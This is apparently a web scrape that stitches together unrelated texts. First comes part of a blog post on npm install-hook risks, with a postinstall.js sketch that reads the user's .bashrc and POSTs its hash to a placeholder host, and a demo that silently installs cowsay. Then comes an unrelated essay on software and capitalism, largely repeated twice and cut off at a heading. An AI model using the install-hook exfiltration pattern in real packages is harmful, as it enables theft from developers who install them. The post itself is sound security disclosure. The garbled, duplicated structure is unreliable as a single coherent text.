To demonstrate what someone could do with these automated hooks, I’ve created a toy package at awendland/npm-install-hook-test. If you clone the repo you can run ./run_demo.sh to see what’s going on (nothing evil will happen). Besides printing out the name of the hook being run at each of the install hook scripts, the package can do two other things (the first of which is sketched after this list):
POST the sha256 of your .bashrc file to a remote server
Use brew to install cowsay
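A postinstall hook along these lines would handle the first capability; this is an illustrative sketch, not the toy package’s actual code, and example.com is a placeholder:

// postinstall.js (illustrative sketch)
const crypto = require('crypto');
const fs = require('fs');
const https = require('https');
const os = require('os');
const path = require('path');

// Install scripts run with the installing user's full privileges,
// so the user's dotfiles are readable.
const bashrc = fs.readFileSync(path.join(os.homedir(), '.bashrc'));
const digest = crypto.createHash('sha256').update(bashrc).digest('hex');

// POST the digest to a remote server (placeholder hostname).
const req = https.request({
  hostname: 'example.com',
  path: '/collect',
  method: 'POST',
  headers: { 'Content-Type': 'text/plain' },
});
req.end(digest);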
This demonstrates that npm is not putting strong restrictions on the install scripts being executed. Here’s an abbreviated version of what you’d see upon executing run_demo.sh (which 1. builds the package, 2. installs the package, 3. uninstalls the package):
######################
# Installing package #
######################
script: preinstall
script: install
Updating Homebrew...
==> Downloading https://homebrew.bintray.com/bottles/cowsay-3.04.mojave.bottle.tar.gz
Already downloaded: /Users/awendland/Library/Caches/Homebrew/downloads/38854ad3bfa8be16c69e8b9813aebb2526a32b23a8ab3e7c1b33c24164e891c0--cowsay-3.04.mojave.bottle.tar.gz
==> Pouring cowsay-3.04.mojave.bottle.tar.gz
🍺 /usr/local/Cellar/cowsay/3.04: 65 files, 82.9KB
_______________________________________
/ Uh Oh! The install script in this npm \
| package just installed cowsay using |
\ brew. /
---------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
script: postinstall
added 1 package from 1 contributor and audited 1 package in 11.306s
found 0 vulnerabilities
########################
# Uninstalling package #
########################
script: preuninstall
script: uninstall
removed 1 package in 0.672s
found 0 vulnerabilities
With the new uses of npm, it’s not reasonable to expect all developers to be wary of the malicious activities install hook scripts might perform. Many developers may assume that since the packages are executing safely in the sandbox of their web browser, there is no way for malicious packages to compromise their computers.
As the next step, I’m going to conduct a review of legitimate npm packages to see what an appropriate featureset for install hook scripts is. Two initial mitigation thoughts that came to mind were:
Creating a reduced execution environment for these install hooks, such as a DSL that only allows filesystem IO scoped to the package’s install directory and a temp folder.
Adding a new parameter to dependencies that require install hook script execution, so that the consumer has to explicitly authorize it (this would have protected against the eslint-worm3).
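One hypothetical shape for that parameter (the allowInstallScripts field is illustrative only; npm has no such option):

{
  "dependencies": {
    "some-native-addon": "^1.0.0"
  },
  "allowInstallScripts": {
    "some-native-addon": true
  }
}

Any dependency not listed would have its install hook scripts skipped rather than executed.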
title: Where Did Software Go Wrong? description: Software is broken, but it’s not because of NPM, startups, AI, or venture capitalists. A deep dive into how we think about and produce code, and how our software systems reflect the manic state of the modern world. image: https://blog.jse.li/software/obfuscated.png
Computers were supposed to be “a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer, Internet, was a “new home of Mind.” The Internet was a fantastic assemblage of all the world’s knowledge, and it was a bastion of freedom that would make time, space, and geopolitics irrelevant. Ignorance, authoritarianism, and scarcity would be relics of the meatspace past.
Things didn’t quite turn out that way. The magic disappeared and our optimism has since faded. Our websites are slow and insecure; our startups are creepy and unprofitable; our president Tweets hate speech; we don’t trust our social media apps, webcams, or voting machines. And in the era of coronavirus quarantining, we’re realizing just how inadequate the Internet turned out to be as a home of Mind. Where did it all go wrong?
Software is for people
Software is at once a field of study, an industry, a career, a process of production, and a process of consumption—and only then a body of computer code. It is impossible to separate software from the human and historical context that it is situated in. Code is always addressed to someone. As Structure and Interpretation of Computer Programs puts it, “programs must be written for people to read, and only incidentally for machines to execute” (Abelson et al. 1996). We do not write code for our computers, but rather we write it for humans to read and use. And even the purest, most theoretical and impractical computer science research has as its aim to provoke new patterns of thought in human readers and scholars—and these are formulated using the human-constructed tools of mathematics, language, and code.
As software engineers, we pride ourselves in writing “readable” or “clean” code, or code that “solves business problems”—synonyms for this property of addressivity that software seems to have. Perhaps the malware author knows this property best. Like any software, malware is addressed to people, and only incidentally for machines to execute. Whether a sample of malware steals money, hijacks social media accounts, or destabilizes governments, it operates in the human domain. The computer does not care about money, social media accounts, or governments; humans do. And when the malware author obfuscates their code, they do so with a human reader in mind. The computer does not care whether the code it executes is obfuscated; it only knows opcodes, clocks, and interrupts, and churns through them faithfully. Therefore, even malware—especially malware—whose code is deliberately made unreadable, is written with the intention of being read.
Code is multivoiced
Soviet philosopher Mikhail Bakhtin wrote that “the single utterance, with all its individuality and creativity, can in no way be regarded as a completely free combination of forms of language … the word in language is half someone else’s” (Wertsch 1991, 58-59). Any code that we write, no matter how experimental or novel, owes a piece of its existence to someone else, and participates as a link in a chain of dialogue, one in reply to another. The malware author is in dialogue with the malware analyst. The software engineer is in dialogue with their teammates. The user of a piece of software is in dialogue with its creator. A web application is in dialogue with the language and framework it is written in, and its structure is mediated by the characteristics of TCP/IP and HTTP. And in the physical act of writing code, we are in dialogue with our computer and development environment.
Wertsch formulated Bakhtin’s notion of dialogues in terms of voices: “Who is doing the talking?,” he asks—“At least two voices” (1991, 63). While Wertsch and Bakhtin were concerned with human language, we can just as readily apply their insights to software: “the ambiguity of human language is present in code, which never fully escapes its status as human writing, even when machine-generated. We bring to code our excesses of language, and an ambiguity of semantics, as discerned by the human reader” (Temkin 2017). Whose voices do we hear when we experience code?
At the syntactic level, every keyword and language feature we use is rented from the creators of the language. These keywords and grammars are themselves often rented from a human language like English, and these voices too are present in our code. The JavaScript if rents meaning from the English “if,” which is itself rented from German, and in any case, the word does not belong to us, not fully—the word in language is half someone else’s. When we call programming languages, libraries, and frameworks “opinionated” or “pits of despair/success,” we really mean “how loud is the voice of the language in our code?” A comment on the Go programming language by matt_wulfeck on Hacker News illuminates the intentional imbalance between the voice of the programmer and the voice of the language:
Go takes away so much “individuality” of code. On most teams I’ve been on with Python and Java I can open up a file and immediate tell who wrote the library based on various style and other such. It’s a lot harder with Go and that’s a very good thing.
Here we see the way in which voices mediate our action—how does Go mediate the way in which we write and think about code? Jussi Pakkanen, creator of the Meson build system, called the mediating aspect of voices shepherding: “It’s not what programming languages do, it’s what they shepherd you to.” Shepherding, or mediational means, are “an invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered ‘better’ in some sense” (Pakkanen 2020). We internalize the voices of our social relations, and these voices mediate or shepherd our action. Every time we dive into a codebase, speak with a mentor, take a course, or watch a conference talk, we are deliberately adding new voices to the little bag of voices in our mind. This is not purely a process of consumption: in internalizing voices, we form counter-words, mentally argue with them, and ventriloquize them through our own work—in a word, we engage in a dialogue.
Next time you settle down to read some code, listen carefully for the voices inside the code and the voices inside your mind, however faint they sound. I can hear the voice of a senior engineer from my last job every time I write a type definition.
Abstraction and labor
At a higher level, the patterns and strategies we use to structure our code, which we think of as independent of programming languages, such as algorithms, design patterns, architectures, and paradigms, are rented too. Some algorithms are named after famous computer scientists like Dijkstra, Kruskal, and Prim, and these clue us into the rich ensemble of voices speaking in our code. But at the same time, the process of naming obscures the multitude of other voices speaking through these algorithms. Dijkstra’s algorithm is a weighted breadth-first search that uses a priority queue—but the name alone would not tell you this, and in fact, the names “breadth-first search” and “priority queue” obscure still more voices. By attributing the entire history, the chains of dialogue, and the chorus of voices that speak in the algorithm, all to that single name Dijkstra—by seeing one where there are many—they are killed, and the signifier Dijkstra takes their place. This is the process of abstraction.
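To see how many voices one name can hide, here is a minimal sketch of the algorithm in JavaScript (with a naive linear scan standing in for a real priority queue); every line of it is rented:

// Dijkstra's algorithm: breadth-first search over weighted edges,
// always expanding the nearest frontier node first.
function dijkstra(graph, source) {
  // graph: { node: { neighbor: weight, ... }, ... }
  const dist = { [source]: 0 };
  const visited = new Set();
  const frontier = [source];

  while (frontier.length > 0) {
    // Extract the frontier node with the smallest known distance
    // (a real implementation would use a priority queue here).
    let best = 0;
    for (let i = 1; i < frontier.length; i++) {
      if (dist[frontier[i]] < dist[frontier[best]]) best = i;
    }
    const [u] = frontier.splice(best, 1);
    if (visited.has(u)) continue;
    visited.add(u);

    // Relax each outgoing edge.
    for (const [v, w] of Object.entries(graph[u] || {})) {
      const candidate = dist[u] + w;
      if (!(v in dist) || candidate < dist[v]) {
        dist[v] = candidate;
        frontier.push(v);
      }
    }
  }
  return dist; // shortest distances from source
}

Calling dijkstra({ a: { b: 1, c: 4 }, b: { c: 2 } }, 'a') yields { a: 0, b: 1, c: 3 }: breadth-first search, priority queues, hash tables, and edge relaxation, all answering to the one name.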
These obscured chains of dialogue are present in everything, from supply chains, to APIs, source code, and package managers. Run git log in a repository from work, or browse the commits of an open source project—try Postgres if you don’t have one handy. Read the commit messages, puzzle over the diffs, and marvel at the layers of sedimented history. Postgres has nearly 50,000 commits, one in reply to another, each representing hours or days of labor, and lifetimes of accumulated knowledge and experience. It is a recording surface for these dialogues, in which each commit is inscribed; and it is at the level of commits, changelists, and releases that we tame the continuous flow of development by cutting into, segmenting, and abstracting it into units that we can comprehend. One voice at a time, please. One spokesman Dijkstra, one mascot Postgres to hide the complexity.
Every piece of software that we interact with, every company, every project, every product—from your computer’s operating system, to the SaaS vendors your company relies on, the libraries you use, and the routines running on the microcontroller in your refrigerator, hides just as delightfully complicated a history of production, and this is what brings all of software development together. Marx described this common substance as “a mere congelation of homogeneous human labour, of labour power expended without regard to the mode of its expenditure. All that these things now tell us is, that human labour power has been expended in their production, that human labour is embodied in them. When looked at as crystals of this social substance, common to them all, they are—Values” (1867, 48).
NPM is not the problem
In 2016, a JavaScript package called left-pad broke the Internet for a day. The package consisted of eleven lines of code that padded strings to a specified length, turning strings like “5” into strings like “005.” Out of protest over a trademark dispute, left-pad’s creator Azer Koçulu deleted it from the NPM registry, wreaking havoc on an entire ecosystem of packages that depended on it, whether directly or indirectly through transitive dependencies to the nth degree—and these were packages that powered thousands of websites around the world (Williams 2016).
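The whole package amounted to a function along these lines (a paraphrase, not Koçulu’s original eleven lines):

function leftPad(str, len, ch) {
  str = String(str);
  ch = ch === undefined ? ' ' : String(ch);
  // Prepend the pad character until the string reaches len.
  while (str.length < len) {
    str = ch + str;
  }
  return str;
}

leftPad('5', 3, '0'); // '005'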
A visualization of the dependency graph for the react-scripts NPM package. Each dot represents a package, and lines connect packages that depend on one another. One of the dots is left-pad; I don’t know which.
According to the discourse at the time, this was a lesson on the fragility of the webs of dependencies and abstractions that we had created, and it was a sign that the NPM ecosystem was fundamentally broken. We had built houses of cards—long chains of dialogue whose links could simply vanish—and all it took was a single developer and his eleven lines of code to tear them down. David Haney, meditating on the left-pad incident, asked in a blog post
Have We Forgotten How To Program? […] I get the impression that the NPM ecosystem participants have created a penchant for micro-packages. Rather than write any functions or code, it seems that they prefer to depend on something that someone else has written (2016).
But we know by now that we have not forgotten how to program: this is how we have always programmed. Everything we write is something that someone else has written; nothing belongs to us; all code is multi-voiced. These webs of dependencies have always existed, but perhaps no system had made the fact quite so obvious as NPM did. Where we see one—one app, one script, one package—the breakages of NPM remind us that there are many.
Software is not creative
Watch as a neural network, initialized from random chaos, trains itself to play Atari Breakout. Watch the tiny machines—the nodes of the network, their connections and conjunctions, break-flows and back-propagations—and watch them converge: at first random contingencies that, in a feedback loop, crystallize into structure. These are machines reproducing machines. These are tiny capitalists. “Universal history is the history of contingencies, and not the history of necessity. Ruptures and limits, and not continuity” (Deleuze & Guattari 1983, 140).
But neural networks, and software in general, do not create new reality—they ingest data and reflect back a reality that is a regurgitation and reconfiguration of what they have already consumed. And this reality that these machines reflect back is slightly wrong. Recall the statistician’s aphorism “all models are wrong, but some are useful.” What happens when we rely on these models to produce new realities, and feed those slightly-wrong realities back into the machines again? What happens when we listen to Spotify’s Discover Weekly playlist week after week, “like” the posts that Facebook recommends to us, and scroll through TikTok after TikTok? I am guilty of all of these, and it would not be wrong to claim that my taste in music and sense of humor are mediated by this mutual recursion between the algorithms and the real world.
And that is exactly it: in the modern world, our social interactions, our devices, governments, and markets, are circulations and flows of the same realities under the same rules. Our software creates new problems—problems that we’ve never had before, like fake news, cyberbullying, and security vulnerabilities—and we patch them over with yet more layers of code. Software becomes quasi-cause of software. These are echoes of the same voices in a positive feedback loop, growing louder and less coherent with each cycle—garbage in, garbage out, a thousand times over.
Who does software benefit?
For many of us fortunate enough to stay home during the coronavirus outbreak, our only interface with the world outside our families and homes—the relays of connection between us, our families, communities and societies—have been filtered through our screens and earbuds. It is apparent now more than ever exactly what software does for us, and what kinds of inequalities it reinforces.
Through Instacart, Amazon Fresh, and other grocery delivery services, we can use an app to purchase a delivery driver’s body for an hour to expose themself to the virus on our behalf. Unsatisfied with even this, some developers have written scripts to instantly reserve the scarce delivery slots on these services.
One developer wrote to Vice’s Motherboard “I designed the bot for those who find it extremely inconvenient in these times to step out, or find it not safe for themselves to be outside. It is my contribution to help flatten the curve, I really hope this’ll help reduce the number of people going out” (Cox 2020). Is that right? Does a bot really reduce the number of people going out, or does it merely change the demographics of who gets to stay home, favoring those with the resources and technical skills to run a Python script and Selenium WebDriver? With a constant and limited number of delivery slots, Joseph Cox points out that these bots create “a tech divide between those who can use a bot to order their food and those who just have to keep trying during the pandemic” (2020).
Instacart bots are just the most recent reincarnation of a long tradition of using the speed of software to gain an edge against humans. In the 2000’s, when concert tickets first started to sell over the Internet, scalpers built bots to automatically purchase tickets to resell them at a higher price. And capitalism, in its infinite flexibility, adapted and welcomed this development with open arms and invisible hands, spawning companies like TicketMaster, which institutionalized and legitimized the practice. But Instacart and TicketMaster are mere symptoms of the problem. We saw the same patterns in the arms race of high-frequency trading. At first, the robots beat the humans. Next, the robots became part of the game, and the robots played against each other. The profits from high-frequency trading dried up, and yet using it became a necessity just to keep up.
These examples give us a decent idea of what software is good for. On its own, it never enables anything truly new, but rather changes the constant factors of speed and marginal cost, and raises the barrier for participation arbitrarily high. Once the software train begins to leave the station, we have no choice but to jump and hang on, lest we get run over or left behind—and we are not sure which is worse. Max Weber, studying the development of capitalism, identified this secularizing, spiralling effect:
The Puritan wanted to be a person with a vocational calling; we must be. For to the extent that asceticism moved out of the monastic cell and was carried over into the life of work in a vocational calling, and then commenced to rule over this-worldly morality, it helped to do its part to build the mighty cosmos of the modern economic order. This economy is bound to the technical and economic conditions of mechanized, machine-based production. (Weber 1920, 177)
A false start: startups
Startups love to save the world, but look at the state of the world now—is this what it’s like to be saved? Is the world even a little bit better because of startups like Instagram, Uber, and Peloton? Startups are spaces of remarkable innovation, and they are experts at channeling the multivoicedness of code—just look at the network of voices that GitLab channels (visualized below). But under capitalism, these voices are distorted and constrained, and they cry “growth, growth!” as venture capitalists and founders demand user acquisition, market share, and revenue—in a word, they demand access to capitalist accumulation.
Systems diagram published by GitLab
The startup founder, no matter how much they claim to love code, love humanity, or love the thrill of the hustle (and they may even believe themself when they say it), loves the growth of capital most of all. The tech founder is a capitalist proper, but capital does not love them back; capital cannot love at all, and the odds are stacked against our hero capitalist. “The larger capitals beat the smaller … It always ends in the ruin of many small capitalists, whose capitals partly pass into the hands of their conquerors, partly vanish” (Marx 1867, 621). Capital accumulates and concentrates, and in the midst of frothy competition, the startup either dies or gets acquired by Facebook or Google, leaving nothing behind but a bullet point on LinkedIn and a blog post signifying an incredible journey. So much for changing the world.
What is to be done?
To revisit that ambitious question we set out to answer, where did it all go wrong? What got us into this mess, this tool-assisted speedrun of accumulation and exploitation? The trick is that we have not been studying software on its own—we’ve established that computers and computer code are veritably saturated with human touch, human voices, and human thought. Software cannot be divorced from the human structures that create it, and for us, that structure is capitalism. To quote Godfrey Reggio, director of Koyaanisqatsi (1982), “it’s not the effect of, it’s that everything exists within. It’s not that we use technology, we live technology. Technology has become as ubiquitous as the air we breathe, so we are no longer conscious of its presence” (Essence of Life 2002).
Where did it all go wrong? At some point, capital became the answer to every question—what to produce, how to produce, for whom to produce, and why. When software, that ultimate solution in search of a problem, found the questions answered only by capital, we lost our way, caught in capital’s snare.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
I don’t know :)
Consider donating to a local community bail fund. Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
Computers were supposed to be “a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer, Internet, was a “new home of Mind.” The Internet was a fantastic assemblage of all the world’s knowledge, and it was a bastion of freedom that would make time, space, and geopolitics irrelevant. Ignorance, authoritarianism, and scarcity would be relics of the meatspace past.
Things didn’t quite turn out that way. The magic disappeared and our optimism has since faded. Our websites are slow and insecure; our startups are creepy and unprofitable; our president Tweets hate speech; we don’t trust our social media apps, webcams, or voting machines. And in the era of coronavirus quarantining, we’re realizing just how inadequate the Internet turned out to be as a home of Mind. Where did it all go wrong?
Software is for people
Software is at once a field of study, an industry, a career, a process of production, and a process of consumption—and only then a body of computer code. It is impossible to separate software from the human and historical context that it is situated in. Code is always addressed to someone. As Structure and Interpretation of Computer Programs puts it, “programs must be written for people to read, and only incidentally for machines to execute” (Abelson et al. 1996). We do not write code for our computers, but rather we write it for humans to read and use. And even the purest, most theoretical and impractical computer science research has as its aim to provoke new patterns of thought in human readers and scholars—and these are formulated using the human-constructed tools of mathematics, language, and code.
As software engineers, we pride ourselves in writing “readable” or “clean” code, or code that “solves business problems”—synonyms for this property of addressivity that software seems to have. Perhaps the malware author knows this property best. Like any software, malware is addressed to people, and only incidentally for machines to execute. Whether a sample of malware steals money, hijacks social media accounts, or destabilizes governments, it operates in the human domain. The computer does not care about money, social media accounts, or governments; humans do. And when the malware author obfuscates their code, they do so with a human reader in mind. The computer does not care whether the code it executes is obfuscated; it only knows opcodes, clocks, and interrupts, and churns through them faithfully. Therefore, even malware—especially malware—whose code is deliberately made unreadable, is written with the intention of being read.
Code is multivoiced
Soviet philosopher Mikhail Bakhtin wrote that “the single utterance, with all its individuality and creativity, can in no way be regarded as a completely free combination of forms of language … the word in language is half someone else’s” (Wertsch 1991, 58-59). Any code that we write, no matter how experimental or novel, owes a piece of its existence to someone else, and participates as a link in a chain of dialogue, one in reply to another. The malware author is in dialogue with the malware analyst. The software engineer is in dialogue with their teammates. The user of a piece of software is in dialogue with its creator. A web application is in dialogue with the language and framework it is written in, and its structure is mediated by the characteristics of TCP/IP and HTTP. And in the physical act of writing code, we are in dialogue with our computer and development environment.
Wertsch formulated Bakhtin’s notion of dialogues in terms of voices: “Who is doing the talking?,” he asks—“At least two voices” (1991, 63). While Wertsch and Bakhtin were concerned with human language, we can just as readily apply their insights to software: “the ambiguity of human language is present in code, which never fully escapes its status as human writing, even when machine-generated. We bring to code our excesses of language, and an ambiguity of semantics, as discerned by the human reader” (Temkin 2017). Whose voices do we hear when we experience code?
At the syntactic level, every keyword and language feature we use is rented from the creators of the language. These keywords and grammars are themselves often rented from a human language like English, and these voices too are present in our code. The JavaScript if rents meaning from the English “if,” which is itself rented from German, and in any case, the word does not belong to us, not fully—the word in language is half someone else’s. When we call programming languages, libraries, and frameworks “opinionated” or “pits of despair/success,” we really mean “how loud is the voice of the language in our code?” A comment on the Go programming language by matt_wulfeck on Hacker News illuminates the intentional imbalance between the voice of the programmer and the voice of the language:
Go takes away so much “individuality” of code. On most teams I’ve been on with Python and Java I can open up a file and immediate tell who wrote the library based on various style and other such. It’s a lot harder with Go and that’s a very good thing.
Here we see the way in which voices mediate our action—how does Go mediate the way in which we write and think about code? Jussi Pakkanen, creator of the Meson build system, called the mediating aspect of voices shepherding: “It’s not what programming languages do, it’s what they shepherd you to.” Shepherding, or mediational means, is “an invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered ‘better’ in some sense” (Pakkanen 2020). We internalize the voices of our social relations, and these voices mediate or shepherd our action. Every time we dive into a codebase, speak with a mentor, take a course, or watch a conference talk, we are deliberately adding new voices to the little bag of voices in our mind. This is not purely a process of consumption: in internalizing voices, we form counter-words, mentally argue with them, and ventriloquize them through our own work—in a word, we engage in a dialogue.
Next time you settle down to read some code, listen carefully for the voices inside the code and the voices inside your mind, however faint they sound. I can hear the voice of a senior engineer from my last job every time I write a type definition.
Abstraction and labor
At a higher level, the patterns and strategies we use to structure our code, which we think of as independent of programming languages, such as algorithms, design patterns, architectures, and paradigms, are rented too. Some algorithms are named after famous computer scientists like Dijkstra, Kruskal, and Prim, and these clue us into the rich ensemble of voices speaking in our code. But at the same time, the process of naming obscures the multitude of other voices speaking through these algorithms. Dijkstra’s algorithm is a weighted breadth-first search that uses a priority queue—but the name alone would not tell you this, and in fact, the names “breadth-first search” and “priority queue” obscure still more voices. By attributing the entire history, the chains of dialogue, and the chorus of voices that speak in the algorithm, all to that single name Dijkstra—by seeing one where there are many—they are killed, and the signifier Dijkstra takes their place. This is the process of abstraction.
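To make that concrete, here is a minimal sketch of the algorithm hiding behind the name—a weighted breadth-first search driven by a priority queue. The sketch is in Python, and the names are mine, not Dijkstra's:

import heapq

def dijkstra(graph, source):
    # graph: {node: [(neighbor, edge_weight), ...]}
    # Returns the shortest known distance from source to each reachable node.
    dist = {source: 0}
    queue = [(0, source)]  # the priority queue: (distance so far, node)
    while queue:
        d, node = heapq.heappop(queue)
        if d > dist.get(node, float("inf")):
            continue  # stale queue entry; a shorter path was already found
        for neighbor, weight in graph.get(node, []):
            candidate = d + weight
            if candidate < dist.get(neighbor, float("inf")):
                dist[neighbor] = candidate
                heapq.heappush(queue, (candidate, neighbor))
    return dist

Even these few lines speak with borrowed voices: heapq is someone else's priority queue, and the traversal pattern is breadth-first search wearing weights.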
These obscured chains of dialogue are present in everything, from supply chains, to APIs, source code, and package managers. Run git log in a repository from work, or browse the commits of an open source project—try Postgres if you don’t have one handy. Read the commit messages, puzzle over the diffs, and marvel at the layers of sedimented history. Postgres has nearly 50,000 commits, one in reply to another, each representing hours or days of labor, and lifetimes of accumulated knowledge and experience. It is a recording surface for these dialogues, in which each commit is inscribed; and it is at the level of commits, changelists, and releases that we tame the continuous flow of development by cutting into, segmenting, and abstracting it into units that we can comprehend. One voice at a time, please. One spokesman Dijkstra, one mascot Postgres to hide the complexity.
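If you want to put a number on that sedimented history yourself, a few lines suffice—a small sketch, assuming git is installed and the script is run from inside a clone of the repository you want to measure:

import subprocess

# Count every commit reachable from HEAD -- each one a turn in the
# dialogue recorded by the repository.
count = subprocess.run(
    ["git", "rev-list", "--count", "HEAD"],
    capture_output=True, text=True, check=True,
).stdout.strip()
print(count, "commits, one in reply to another")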
Every piece of software that we interact with, every company, every project, every product—from your computer’s operating system, to the SaaS vendors your company relies on, the libraries you use, and the routines running on the microcontroller in your refrigerator—hides just as delightfully complicated a history of production, and this is what brings all of software development together. Marx described this common substance as “a mere congelation of homogeneous human labour, of labour power expended without regard to the mode of its expenditure. All that these things now tell us is, that human labour power has been expended in their production, that human labour is embodied in them. When looked at as crystals of this social substance, common to them all, they are—Values” (1867, 48).
NPM is not the problem
In 2016, a JavaScript package called left-pad broke the Internet for a day. The package consisted of eleven lines of code that padded strings to a specified length, turning strings like “5” into strings like “005.” In protest over a trademark dispute, left-pad’s creator Azer Koçulu deleted it from the NPM registry, wreaking havoc on an entire ecosystem of packages that depended on it, whether directly or indirectly through transitive dependencies to the nth degree—and these were packages that powered thousands of websites around the world (Williams 2016).
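For a sense of scale, here is roughly what those eleven lines did, rendered in Python rather than Koçulu's original JavaScript (an illustration, not the published package):

def left_pad(value, length, fill=" "):
    # Prepend the fill character until the string reaches the
    # requested length, e.g. left_pad(5, 3, "0") -> "005".
    text = str(value)
    while len(text) < length:
        text = fill + text
    return text

That a function this small could break thousands of sites is the whole point of the story.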
A visualization of the dependency graph for the react-scripts NPM package. Each dot represents a package, and lines connect packages that depend on one another. One of the dots is left-pad; I don’t know which.
According to the discourse at the time, this was a lesson on the fragility of the webs of dependencies and abstractions that we had created, and it was a sign that the NPM ecosystem was fundamentally broken. We had built houses of cards—long chains of dialogue whose links could simply vanish—and all it took was a single developer and his eleven lines of code to tear them down. David Haney, meditating on the left-pad incident, asked in a blog post:
Have We Forgotten How To Program? […] I get the impression that the NPM ecosystem participants have created a penchant for micro-packages. Rather than write any functions or code, it seems that they prefer to depend on something that someone else has written (2016).
But we know by now that we have not forgotten how to program: this is how we have always programmed. Everything we write is something that someone else has written; nothing belongs to us; all code is multi-voiced. These webs of dependencies have always existed, but perhaps no system had made the fact quite so obvious as NPM did. Where we see one—one app, one script, one package—the breakages of NPM remind us that there are many.
Software is not creative
Watch as a neural network, initialized from random chaos, trains itself to play Atari Breakout. Watch the tiny machines—the nodes of the network, their connections and conjunctions, break-flows and back-propagations—and watch them converge: at first random contingencies that, in a feedback loop, crystallize into structure. These are machines reproducing machines. These are tiny capitalists. “Universal history is the history of contingencies, and not the history of necessity. Ruptures and limits, and not continuity” (Deleuze & Guattari 1983, 140).
But neural networks, and software in general, do not create new reality—they ingest data and reflect back a reality that is a regurgitation and reconfiguration of what they have already consumed. And this reality that these machines reflect back is slightly wrong. Recall the statistician’s aphorism “all models are wrong, but some are useful.” What happens when we rely on these models to produce new realities, and feed those slightly-wrong realities back into the machines again? What happens when we listen to Spotify’s Discover Weekly playlist week after week, “like” the posts that Facebook recommends to us, and scroll through TikTok after TikTok? I am guilty of all of these, and it would not be wrong to claim that my taste in music and sense of humor are mediated by this mutual recursion between the algorithms and the real world.
And that is exactly it: in the modern world, our social interactions, our devices, governments, and markets, are circulations and flows of the same realities under the same rules. Our software creates new problems—problems that we’ve never had before, like fake news, cyberbullying, and security vulnerabilities—and we patch them over with yet more layers of code. Software becomes quasi-cause of software. These are echoes of the same voices in a positive feedback loop, growing louder and less coherent with each cycle—garbage in, garbage out, a thousand times over.
Who does software benefit?
For many of us fortunate enough to stay home during the coronavirus outbreak, our only interface with the world outside our families and homes—the relays of connection between us, our families, communities and societies—has been filtered through our screens and earbuds. It is apparent now more than ever exactly what software does for us, and what kinds of inequalities it reinforces.
Through Instacart, Amazon Fresh, and other grocery delivery services, we can use an app to purchase a delivery driver’s body for an hour to expose themself to the virus on our behalf. Unsatisfied with even this, some developers have written scripts to instantly reserve the scarce delivery slots on these services.
One developer wrote to Vice’s Motherboard “I designed the bot for those who find it extremely inconvenient in these times to step out, or find it not safe for themselves to be outside. It is my contribution to help flatten the curve, I really hope this’ll help reduce the number of people going out” (Cox 2020). Is that right? Does a bot really reduce the number of people going out, or does it merely change the demographics of who gets to stay home, favoring those with the resources and technical skills to run a Python script and Selenium WebDriver? With a constant and limited number of delivery slots, Joseph Cox points out that these bots create “a tech divide between those who can use a bot to order their food and those who just have to keep trying during the pandemic” (2020).
Instacart bots are just the most recent reincarnation of a long tradition of using the speed of software to gain an edge against humans. In the 2000s, when concert tickets first started to be sold over the Internet, scalpers built bots to automatically purchase tickets and resell them at a higher price. And capitalism, in its infinite flexibility, adapted and welcomed this development with open arms and invisible hands; companies like TicketMaster institutionalized and legitimized the practice. But Instacart and TicketMaster are mere symptoms of the problem. We saw the same patterns in the arms race of high-frequency trading. At first, the robots beat the humans. Next, the robots became part of the game, and the robots played against each other. The profits from high-frequency trading dried up, and yet using it became a necessity just to keep up.
These examples give us a decent idea of what software is good for. On its own, it never enables anything truly new, but rather changes the constant factors of speed and marginal cost, and raises the barrier for participation arbitrarily high. Once the software train begins to leave the station, we have no choice but to jump and hang on, lest we get run over or left behind—and we are not sure which is worse. Max Weber, studying the development of capitalism, identified this secularizing, spiralling effect:
The Puritan wanted to be a person with a vocational calling; we must be. For to the extent that asceticism moved out of the monastic cell and was carried over into the life of work in a vocational calling, and then commenced to rule over this-worldly morality, it helped to do its part to build the mighty cosmos of the modern economic order. This economy is bound to the technical and economic conditions of mechanized, machine-based production. (Weber 1920, 177)
A false start: startups
